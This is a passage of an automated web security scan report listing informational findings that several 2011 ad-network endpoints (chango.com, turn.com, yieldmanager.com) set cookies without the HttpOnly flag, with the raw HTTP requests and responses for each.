HTTP/1.1 302 Found
Set-Cookie: trgs=382922425; domain=.triggit.com; path=/;
Location: http://tag.admeld.com/match?admeld_adprovider_id=310&external_user_id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=ogo3ps
Date: Mon, 02 May 2011 02:00:25 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting
17.53. http://ab-m.d.chango.com/m/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ab-m.d.chango.com
Path:   /m/ab

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/ab HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ab-m.d.chango.com

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://ads.adbrite.com/adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=3728e74c-7461-11e0-9185-00259009a9e4; Domain=chango.com; expires=Thu, 29 Apr 2021 02:09:30 GMT; Path=/
Connection: close

17.54. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.turn.com
Cookie: uid=3207951335209607633; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004; rds=undefined%7C15013%7C15013%7Cundefined%7Cundefined%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7Cundefined%7C15013; rv=1; pf=_90PbWHCfHQmA1ivIIw5G4EMKdh5ityF6sgfR1rZxdwyIhcl0EGWggtbGC91oY8VKc-gdz7WzBmsN9YXs4uSIOzqBFjueX7aZwnvRhcSBs3iaWve_wv63PKco4w-BWK9o8OpL6FMs5ncMADcj7HCCZOL681iuOj2kWoOE2k1qPBfidfcs42JZlIwUalAHVDrgEz_nvLc-cdbQ5JtcKrDVQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3207951335209607633; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:09:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:09:28 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3207951335209607633&rnd=6934683957726833621&fpid=7&nu=n&t=
...[SNIP]...
17.55. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0418.2rm.ac4
Set-Cookie: ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjve!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: vuday1=Ajz6%!?-x!@eJsf; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<y+o`M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<yi^'M.jTN"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=t07yR!?-x!TDjBo; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:09 GMT
Pragma: no-cache
Content-Length: 1185
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(5589522);}
</script><IFRAME SRC="htt
...[SNIP]...
17.56. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&Z=300x250&cb=1304292783315180&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15ps83od6%2FM%3D787833%2E14445110%2E14291877%2E12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq%5FKEwNPVs%2D%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24&S=14445110&i=140477&D=zip%3D05672%26ycg%3D%26yyob%3D&_salt=3283334435&B=10&u=http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0881.2rm.ac4
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:33:47 GMT
Pragma: no-cache
Content-Length: 1811
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://ads.bluelithium.com/iframe3?WaUDANG
...[SNIP]...
17.57. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=551156&id=551152&id=551088&id=551148&id=589219&id=589217&id=1064432&id=1261750&id=589218&id=589212&id=738460&id=1188384&id=1191120&id=589211&id=914468&id=914461&id=914466&id=967163&id=1174746&id=1206542&id=1239405&id=914467&id=97604&id=583346&id=97597&id=276623&id=956577&id=956606&id=1195408&id=276615&id=574521&id=97604&id=589217&id=589207&id=583346&id=606977&id=498075&id=750434&id=759603&id=759564&id=1053320&id=759583&id=914464&id=970914&id=1053425&id=1053432&id=1188391&id=hoi_=1&id=1216979&id=1267429&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; 